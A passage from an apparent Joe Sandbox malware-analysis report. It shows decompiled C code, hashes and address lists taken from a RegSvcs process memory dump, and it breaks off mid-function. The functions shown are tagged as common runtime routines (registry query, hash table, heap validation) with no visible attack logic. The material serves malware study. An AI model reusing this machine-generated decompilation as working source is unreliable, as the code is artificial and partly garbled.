                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6b24c0cccd9bf09a85a9ae5f738efce945a102b1760b42d8329b8bb582348cf
                                          • Instruction ID: 3e4645a40c6813e63962c30354ac50f60cd798b620ce5e1ab5fc0ee00c92579a
                                          • Opcode Fuzzy Hash: e6b24c0cccd9bf09a85a9ae5f738efce945a102b1760b42d8329b8bb582348cf
                                          • Instruction Fuzzy Hash: A2814931E0021ACBDB18DFA8C8909ECBBB1BF59718B14436DE416AB386DB319D49DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 012FC600 Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E012FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x13ed360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01306D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0133B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x13e7b9c; // 0x0
					_t74 = L01314620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01339650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L013177F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0133F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E013313C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L013177F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01339650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































                                          0x012fc608
                                          0x012fc615
                                          0x012fc625
                                          0x012fc62d
                                          0x012fc635
                                          0x012fc640
                                          0x012fc680
                                          0x012fc687
                                          0x012fc688
                                          0x012fc689
                                          0x012fc694
                                          0x012fc694
                                          0x012fc642
                                          0x012fc64a
                                          0x012fc697
                                          0x01367a25
                                          0x01367a2b
                                          0x01367a2e
                                          0x01367a30
                                          0x01367bea
                                          0x01367bea
                                          0x00000000
                                          0x01367bea
                                          0x01367a36
                                          0x01367a43
                                          0x01367a48
                                          0x01367a4c
                                          0x01367a4e
                                          0x00000000
                                          0x00000000
                                          0x01367a58
                                          0x01367a5a
                                          0x01367a5b
                                          0x01367a5c
                                          0x01367a5d
                                          0x01367a63
                                          0x01367a64
                                          0x01367a6a
                                          0x01367a6c
                                          0x01367a6e
                                          0x013679cb
                                          0x013679cb
                                          0x013679ce
                                          0x013679d0
                                          0x01367a98
                                          0x01367a9b
                                          0x01367a9b
                                          0x01367a9e
                                          0x01367aa1
                                          0x01367bbe
                                          0x01367bbe
                                          0x01367bc0
                                          0x01367be0
                                          0x01367be0
                                          0x01367a01
                                          0x01367a01
                                          0x01367a05
                                          0x01367a07
                                          0x01367a15
                                          0x01367a15
                                          0x01367a1a
                                          0x00000000
                                          0x01367a1a
                                          0x01367bc2
                                          0x01367bc6
                                          0x01367bc9
                                          0x01367bcd
                                          0x01367bcf
                                          0x013679e6
                                          0x013679e6
                                          0x013679eb
                                          0x013679eb
                                          0x013679ef
                                          0x013679f1
                                          0x00000000
                                          0x00000000
                                          0x013679f3
                                          0x013679f5
                                          0x013679ff
                                          0x013679ff
                                          0x00000000
                                          0x013679ff
                                          0x013679f7
                                          0x013679fd
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013679fd
                                          0x01367bd5
                                          0x01367bd8
                                          0x00000000
                                          0x00000000
                                          0x01367ba9
                                          0x01367bac
                                          0x01367bb0
                                          0x01367bb1
                                          0x01367bb1
                                          0x01367bb6
                                          0x00000000
                                          0x01367bb6
                                          0x01367aa7
                                          0x01367aaa
                                          0x00000000
                                          0x00000000
                                          0x01367ab2
                                          0x01367ab3
                                          0x01367ab5
                                          0x01367aec
                                          0x01367aef
                                          0x01367b25
                                          0x01367b28
                                          0x01367b62
                                          0x01367b64
                                          0x01367b8f
                                          0x01367b92
                                          0x01367b96
                                          0x01367b98
                                          0x00000000
                                          0x00000000
                                          0x01367b9e
                                          0x01367b9f
                                          0x01367ba3
                                          0x00000000
                                          0x01367ba3
                                          0x01367b66
                                          0x01367b68
                                          0x01367ae2
                                          0x01367ae2
                                          0x00000000
                                          0x01367ae2
                                          0x01367b6e
                                          0x01367b72
                                          0x01367b75
                                          0x01367b81
                                          0x01367b85
                                          0x01367b87
                                          0x00000000
                                          0x00000000
                                          0x01367b31
                                          0x01367b34
                                          0x01367b3c
                                          0x01367b45
                                          0x01367b46
                                          0x01367b4f
                                          0x01367b51
                                          0x01367b57
                                          0x01367b59
                                          0x01367b59
                                          0x00000000
                                          0x01367b59
                                          0x01367b77
                                          0x00000000
                                          0x01367b77
                                          0x01367b2a
                                          0x00000000
                                          0x01367b2a
                                          0x01367af1
                                          0x01367af3
                                          0x00000000
                                          0x00000000
                                          0x01367afb
                                          0x01367afc
                                          0x01367afe
                                          0x00000000
                                          0x00000000
                                          0x01367b00
                                          0x01367b03
                                          0x00000000
                                          0x00000000
                                          0x01367b05
                                          0x01367b09
                                          0x01367b0d
                                          0x01367b0f
                                          0x00000000
                                          0x00000000
                                          0x01367b18
                                          0x01367b1d
                                          0x00000000
                                          0x01367b1d
                                          0x01367ab7
                                          0x01367ab9
                                          0x00000000
                                          0x00000000
                                          0x01367abf
                                          0x01367ac1
                                          0x00000000
                                          0x00000000
                                          0x01367ac3
                                          0x01367ac6
                                          0x00000000
                                          0x00000000
                                          0x01367ac8
                                          0x01367acc
                                          0x01367ad0
                                          0x01367ad2
                                          0x00000000
                                          0x00000000
                                          0x01367adb
                                          0x00000000
                                          0x01367adb
                                          0x013679d6
                                          0x013679d9
                                          0x013679dc
                                          0x01367a91
                                          0x01367a94
                                          0x00000000
                                          0x01367a94
                                          0x013679e2
                                          0x00000000
                                          0x013679e2
                                          0x01367a74
                                          0x01367a7a
                                          0x00000000
                                          0x00000000
                                          0x01367a8a
                                          0x01367a21
                                          0x01367a21
                                          0x00000000
                                          0x01367a21
                                          0x012fc650
                                          0x012fc651
                                          0x012fc656
                                          0x012fc65c
                                          0x012fc65d
                                          0x012fc663
                                          0x012fc664
                                          0x012fc66a
                                          0x012fc66e
                                          0x013679c5
                                          0x013679c7
                                          0x00000000
                                          0x013679c7
                                          0x012fc67a
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9731e9d76d193a3dbd7b6a1ad52c838ea237b58b3c561130b8b2b093ec4bc969
                                          • Instruction ID: f858ced0325f5ce350a81ca2f09325c644e179017fd6f37aec503cf57eb71a5d
                                          • Opcode Fuzzy Hash: 9731e9d76d193a3dbd7b6a1ad52c838ea237b58b3c561130b8b2b093ec4bc969
                                          • Instruction Fuzzy Hash: EB8192756142068BDB26CE58C880E7E77ECEF8435CF54886AEE459B349D330DD41CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B03DA Relevance: .2, Instructions: 218COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 73%
                                          			E013B03DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				signed char _v28;
				signed int _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				intOrPtr* _t80;
				signed int _t87;
				signed char _t90;
				signed int _t107;
				intOrPtr* _t119;
				signed int _t120;
				signed int _t121;
				signed char _t127;
				void* _t129;
				intOrPtr* _t130;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed char _t148;
				signed int _t154;
				signed char _t155;
				signed int _t164;
				unsigned int _t167;
				signed int _t168;
				signed int _t170;
				unsigned int _t173;
				signed int* _t174;
				signed int _t175;
				intOrPtr* _t177;
				signed int _t178;
				signed int _t179;
				signed int _t180;
				signed char _t183;
				intOrPtr _t184;
				unsigned int _t186;
				unsigned int _t187;

				_push( *0x13e634c);
				_t119 = __ecx;
				_t184 = __edx;
				_push( *0x13e6348);
				_v20 = __ecx;
				_push(0);
				_t129 = 0xc;
				_t80 = E013BBBBB(_t129, _t129);
				_t130 = _t80;
				_v16 = _t130;
				if(_t130 == 0) {
					return _t80;
				}
				 *((intOrPtr*)(_t130 + 8)) = _a4;
				_t82 =  &(__ecx[1]);
				 *((intOrPtr*)(_t130 + 4)) = _t184;
				_v36 =  &(__ecx[1]);
				E01312280( &(__ecx[1]), _t82);
				_v12 = 1;
				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
				_t120 = _t119 + 8;
				_t175 =  *(_t120 + 4);
				_t87 = _t175 >> 5;
				if( *_t120 < _t87 + _t87) {
					L22:
					_t186 = _t175 >> 5;
					_t177 = _v16;
					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
					_v8 = _t90;
					_t137 =  *(_t120 + 8);
					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
					_t67 = _t186 - 1; // 0xffffffdf
					_t164 = _t67 & _v8;
					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
					 *_t120 =  *_t120 + 1;
					_t178 = 0;
					L23:
					 *_v20 =  *_v20 & 0x00000000;
					E0130FFB0(_t120, _t178, _v36);
					if(_t178 != 0) {
						E013BBCD2(_t178,  *0x13e6348,  *0x13e634c);
					}
					return _v12;
				}
				_t139 = 2;
				_t87 = E0132F3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
				if(_t87 < 0) {
					goto L22;
				}
				_t187 = _v8;
				if(_t187 < 4) {
					_t187 = 4;
				}
				_push(0);
				_t87 = E013B0150(_t187 << 2);
				_t179 = _t87;
				_v8 = _t179;
				if(_t179 == 0) {
					_t175 =  *(_t120 + 4);
					if(_t175 >= 0x20) {
						goto L22;
					}
					_v12 = _v12 & 0x00000000;
					_t178 = _v16;
					goto L23;
				} else {
					_t19 = _t187 - 1; // 0x3
					_t141 = _t19;
					if((_t187 & _t141) == 0) {
						L10:
						if(_t187 > 0x4000000) {
							_t187 = 0x4000000;
						}
						_v28 = _v28 & 0x00000000;
						_t167 = _t187 << 2;
						_t107 = _t120 | 0x00000001;
						_v24 = _t179;
						_t168 = _t167 >> 2;
						asm("sbb ecx, ecx");
						_t144 =  !(_t167 + _t179) & _t168;
						if(_t144 <= 0) {
							L15:
							_t180 = 0;
							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
							_v24 = _t170;
							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
								L20:
								_t147 =  *(_t120 + 8);
								_t87 = _v8;
								_t175 =  *(_t120 + 4) & 0x0000001f | _t187 << 0x00000005;
								 *(_t120 + 8) = _t87;
								 *(_t120 + 4) = _t175;
								if( *(_t120 + 8) != 0) {
									_push(0);
									_t87 = E013B0180(_t147);
									_t175 =  *(_t120 + 4);
								}
								goto L22;
							} else {
								goto L16;
							}
							do {
								L16:
								_t121 =  *(_t120 + 8);
								_v32 = _t121;
								while(1) {
									_t148 =  *(_t121 + _t180 * 4);
									_v28 = _t148;
									if((_t148 & 0x00000001) != 0) {
										goto L19;
									}
									 *(_t121 + _t180 * 4) =  *_t148;
									_t124 =  *(_t148 + 4) & _t170;
									_t173 = _v8;
									_t154 = _t187 - 0x00000001 & (( *(_t148 + 4) & _t170) >> 0x00000018) + ((( *(_t148 + 4) & _t170) >> 0x00000010 & 0x000000ff) + ((_t124 >> 0x00000008 & 0x000000ff) + ((_t124 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
									_t127 = _v28;
									 *_t127 =  *(_t173 + _t154 * 4);
									 *(_t173 + _t154 * 4) = _t127;
									_t170 = _v24;
									_t121 = _v32;
								}
								L19:
								_t180 = _t180 + 1;
								_t120 =  &(_v20[2]);
							} while (_t180 <  *(_t120 + 4) >> 5);
							goto L20;
						} else {
							_t174 = _t179;
							_t183 = _v28;
							do {
								_t183 = _t183 + 1;
								 *_t174 = _t107;
								_t174 =  &(_t174[1]);
							} while (_t183 < _t144);
							goto L15;
						}
					}
					_t155 = _t141 | 0xffffffff;
					if(_t187 == 0) {
						L9:
						_t187 = 1 << _t155;
						goto L10;
					} else {
						goto L8;
					}
					do {
						L8:
						_t155 = _t155 + 1;
						_t187 = _t187 >> 1;
					} while (_t187 != 0);
					goto L9;
				}
			}













































                                          0x013b03e5
                                          0x013b03eb
                                          0x013b03ed
                                          0x013b03ef
                                          0x013b03f5
                                          0x013b03f8
                                          0x013b03fc
                                          0x013b03ff
                                          0x013b0404
                                          0x013b0406
                                          0x013b040b
                                          0x013b0619
                                          0x013b0619
                                          0x013b0414
                                          0x013b0417
                                          0x013b041b
                                          0x013b041e
                                          0x013b0421
                                          0x013b042c
                                          0x013b0436
                                          0x013b0438
                                          0x013b043b
                                          0x013b0440
                                          0x013b0448
                                          0x013b058e
                                          0x013b0596
                                          0x013b059b
                                          0x013b05a0
                                          0x013b05a3
                                          0x013b05d1
                                          0x013b05d6
                                          0x013b05d9
                                          0x013b05dc
                                          0x013b05e2
                                          0x013b05e4
                                          0x013b05e7
                                          0x013b05e9
                                          0x013b05eb
                                          0x013b05f1
                                          0x013b05f4
                                          0x013b05fb
                                          0x013b060b
                                          0x013b060b
                                          0x00000000
                                          0x013b0610
                                          0x013b0450
                                          0x013b0458
                                          0x013b045f
                                          0x00000000
                                          0x00000000
                                          0x013b0465
                                          0x013b046b
                                          0x013b046f
                                          0x013b046f
                                          0x013b0472
                                          0x013b0478
                                          0x013b047d
                                          0x013b047f
                                          0x013b0484
                                          0x013b061c
                                          0x013b0622
                                          0x00000000
                                          0x00000000
                                          0x013b0628
                                          0x013b062c
                                          0x00000000
                                          0x013b048a
                                          0x013b048a
                                          0x013b048a
                                          0x013b048f
                                          0x013b04a2
                                          0x013b04a9
                                          0x013b04ab
                                          0x013b04ab
                                          0x013b04ad
                                          0x013b04b3
                                          0x013b04b8
                                          0x013b04bb
                                          0x013b04c1
                                          0x013b04c6
                                          0x013b04ca
                                          0x013b04cc
                                          0x013b04dd
                                          0x013b04e6
                                          0x013b04e8
                                          0x013b04f1
                                          0x013b04f4
                                          0x013b0568
                                          0x013b056b
                                          0x013b0571
                                          0x013b0577
                                          0x013b0579
                                          0x013b057c
                                          0x013b0581
                                          0x013b0583
                                          0x013b0586
                                          0x013b058b
                                          0x013b058b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b04f6
                                          0x013b04f6
                                          0x013b04f6
                                          0x013b04f9
                                          0x013b04fc
                                          0x013b04fc
                                          0x013b04ff
                                          0x013b0505
                                          0x00000000
                                          0x00000000
                                          0x013b0509
                                          0x013b050f
                                          0x013b0532
                                          0x013b0542
                                          0x013b0544
                                          0x013b054a
                                          0x013b054c
                                          0x013b054f
                                          0x013b0552
                                          0x013b0552
                                          0x013b0557
                                          0x013b055a
                                          0x013b055b
                                          0x013b0564
                                          0x00000000
                                          0x013b04ce
                                          0x013b04ce
                                          0x013b04d0
                                          0x013b04d3
                                          0x013b04d3
                                          0x013b04d4
                                          0x013b04d6
                                          0x013b04d9
                                          0x00000000
                                          0x013b04d3
                                          0x013b04cc
                                          0x013b0491
                                          0x013b0496
                                          0x013b049d
                                          0x013b04a0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013b0498
                                          0x013b0498
                                          0x013b0498
                                          0x013b0499
                                          0x013b0499
                                          0x00000000
                                          0x013b0498

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5168f82943739878e428a71945346d2fe2656220f6832cc5438a62daa2f6a50c
                                          • Instruction ID: aa368aff12d64833ae52aa2b744f64eb23b0c0bfdac1816c297217cc1396cf2f
                                          • Opcode Fuzzy Hash: 5168f82943739878e428a71945346d2fe2656220f6832cc5438a62daa2f6a50c
                                          • Instruction Fuzzy Hash: EA71C572A00215DBDB28CF5CC8C1BAEBBF6EB84314F198269E915AF785D734D941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013AFA2B Relevance: .2, Instructions: 214COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 25%
                                          			E013AFA2B(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				signed char _t106;
				intOrPtr _t107;
				signed char _t114;
				signed short _t116;
				signed short _t117;
				signed short _t121;
				signed short _t123;
				signed int* _t127;
				signed int _t128;
				signed int _t130;
				signed short _t134;
				void* _t135;
				signed int* _t136;
				void* _t138;
				signed int _t148;
				signed int _t154;
				signed int _t156;
				signed int _t157;
				intOrPtr _t163;
				intOrPtr _t168;
				void* _t169;
				intOrPtr _t171;

				_t157 = __edx;
				_push(0x2c);
				_push(0x13d0e38);
				_t98 = E0134D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t169 - 0x34)) = __edx;
				_t168 = __ecx;
				 *((intOrPtr*)(_t169 - 0x38)) = __ecx;
				 *((intOrPtr*)(_t169 - 0x20)) = 0;
				 *((intOrPtr*)(_t169 - 0x1c)) = 0;
				_t171 =  *0x13e7bc8; // 0x0
				if(_t171 == 0) {
					 *((intOrPtr*)(_t169 - 4)) = 0;
					_t148 =  *__edx;
					 *(_t169 - 0x2c) = _t148 & 0x0000ffff;
					 *(_t169 - 0x28) = _t148 >> 0x18;
					 *(_t169 - 0x24) = _t148 >> 8;
					_t106 = _t148 >> 0x10;
					if(( *(__ecx + 0x4c) & _t148) == 0) {
						 *((intOrPtr*)(_t169 - 0x1c)) = 0xa;
						if(( *(__ecx + 0x40) & 0x04000000) != 0 ||  *(_t169 - 0x28) == (_t106 ^ _t148 ^  *(_t169 - 0x24))) {
							_t148 =  *(_t169 - 0x2c) & 0x0000ffff;
							 *((intOrPtr*)(_t169 - 0x1c)) = 1;
							_t114 =  *((intOrPtr*)(_t157 + 6));
							if(_t114 == 0) {
								_t163 = _t168;
							} else {
								_t163 = (1 - (_t114 & 0x000000ff) << 0x10) + (_t157 & 0xffff0000);
							}
							 *((intOrPtr*)(_t169 - 0x20)) = _t163;
							_t116 = _t148 & 0x0000ffff;
							if( *((intOrPtr*)(_t163 + 8)) == 0xffeeffee) {
								_t148 =  *((intOrPtr*)(_t157 + 7));
								if(_t148 == 4) {
									L12:
									_t117 = _t116 & 0x0000ffff;
									 *(_t169 - 0x2c) = _t117;
									 *((intOrPtr*)(_t169 - 0x1c)) = 3;
									if(_t148 != 3) {
										 *((intOrPtr*)(_t169 - 0x1c)) = 6;
										_t148 =  *(_t168 + 0x54) & 0x0000ffff;
										 *(_t169 - 0x24) = _t148;
										_push(0);
										_pop(0);
										if(( *(_t157 + 4 + (_t117 & 0x0000ffff) * 8) ^ _t148) ==  *(_t169 - 0x2c)) {
											_t121 = _t148;
											goto L23;
										}
									} else {
										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x13afcfb) & 0x000000ff) * 4 +  &M013AFCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
